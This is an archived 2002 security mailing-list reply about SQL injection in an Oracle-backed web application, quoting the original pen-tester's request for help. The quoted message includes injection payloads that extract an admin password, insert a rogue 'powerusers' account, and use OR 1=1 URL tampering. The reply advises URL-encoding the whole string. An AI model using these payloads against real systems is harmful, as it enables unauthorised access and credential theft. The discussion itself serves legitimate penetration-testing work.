Re: SQL Injection

From: Chris Humphries (chumphries@devis.com)
Date: 06/11/02 

Date: Tue, 11 Jun 2002 15:32:14 -0500
From: Chris Humphries <chumphries@devis.com>
To: Qyves <zqyves@netscape.net>

try url encoding the entire string. also note that ; is a
"reserved" part of urls syntax, like ? and &.

also if it is java, it maybe using odbc driver to connect to
oracle, and that may not allow for that anywho.

just some ideas...

=On Tue, Jun 11, 2002 at 04:30:48AM -0400,
=recieved 2.7K bytes from Qyves containing this:
> Hello all,
>
> Last time this was denied on pen-test due to cross-posting issues.
>
> I am currently pen-testing a web app and I am stuck in trying to execute two queries sequentially in Oracle.
>
> To my knowledge I can do this in SQL by separating the two queries with ; however this is no happening in my case in two circumstances...
>
> Here goes the history:
>
> Case1:
>
> I have a discovered an injectable sql query that is fed its data from a web form, the end query build by a cgi-script being
>
> something along those lines:
>
> (insert into tab_nam values ('a','b','c','d','e')); - a-e values from the web form- with me being able to inject through
>
> concatenation and subqueries between any of those fields a SELECT query.
>
> e.g.
> e='||select password from users where username='adm'||'
> query=(insert into tab_nam values ('a','b','c','d',''||select password from users where username='adm'||''));
>
> I tried an INSERT to no avail, fair enough since I don't thing that INSERTs are allowed in nested queries... (or are they??)
>
> The last characters added by the cgi script are the ));
>
> e.g.
> e=aa')); (insert into powerusers values ('test', 'pwd
> ^^-- This gets around the NULL value insertion problem
> query=(insert into tab_nam values ('a','b','c','d','aa')); (insert into powerusers values ('test', 'pwd'));
>
> Those two queries should be executed sequentially but Oracle conplains with an Invalid character error
>
> Case 2:
>
> I have also found a second query I can insert to and parts of it are actually shown raw in the URL as an input to a servlet
>
> script e.g. /stupid.cgi?A=123%20AND%20%ID=101
>
> This query appers to be something in the form of:
> SELECT foo from bar where [URL] ;
>
> I can inject an OR 1=1 in the above Url and get all the rows... However when I try the sequential queries again I fail
>
> miserably url=/stupid.cgi?A=123%20AND%20%ID=101%20OR%201=1
>
> original url=/stupidservlet?A=123%20AND%20%ID=101
> modified url=/stupidservlet?A=123%20AND%20%ID=101; insert into powerusers values ('test', 'pwd)
>
> I have full control over the url however I get just a "Server Error" back.
>
> Any clues on how to make any of these methods work anyone??
>
> Thanks in advance.
>
> Qyves
>
>
>
>
>
> __________________________________________________________________
> Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! http://shopnow.netscape.com/
>
> Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/
>
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please see:
> https://alerts.securityfocus.com/

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Relevant Pages

  • SQL Injection
    ... I am currently pen-testing a web app and I am stuck in trying to execute two queries sequentially in Oracle. ... To my knowledge I can do this in SQL by separating the two queries with; however this is no happening in my case in two circumstances... ... I have a discovered an injectable sql query that is fed its data from a web form, the end query build by a cgi-script being ... This list is provided by the SecurityFocus Security Intelligence Alert ...
    (Pen-Test)
  • Re: Send output to file in SQL
    ... there are couple of ways to do this in Microsoft SQL Server. ... - Run the query from command line, using isql.exe or osql.exe by passing ... This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ...
    (Pen-Test)
  • RE: SQL Injection
    ... > I have a discovered an injectable sql query that is fed its data from a web form, the end query build by a cgi-script being ... > This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ...
    (Pen-Test)
  • RE: Cross Site Scripting Vulnerabilities - XSS
    ... Cross Site Scripting Vulnerabilities - XSS ... >> This list is provided by the SecurityFocus Security Intelligence ... For more information on SecurityFocus' SIA service which ...
    (Pen-Test)
  • Re: Cross Site Scripting Vulnerabilities - XSS
    ... Cross Site Scripting Vulnerabilities - XSS ... >>> This list is provided by the SecurityFocus Security Intelligence ... For more information on SecurityFocus' SIA service which ...
    (Pen-Test)
Loading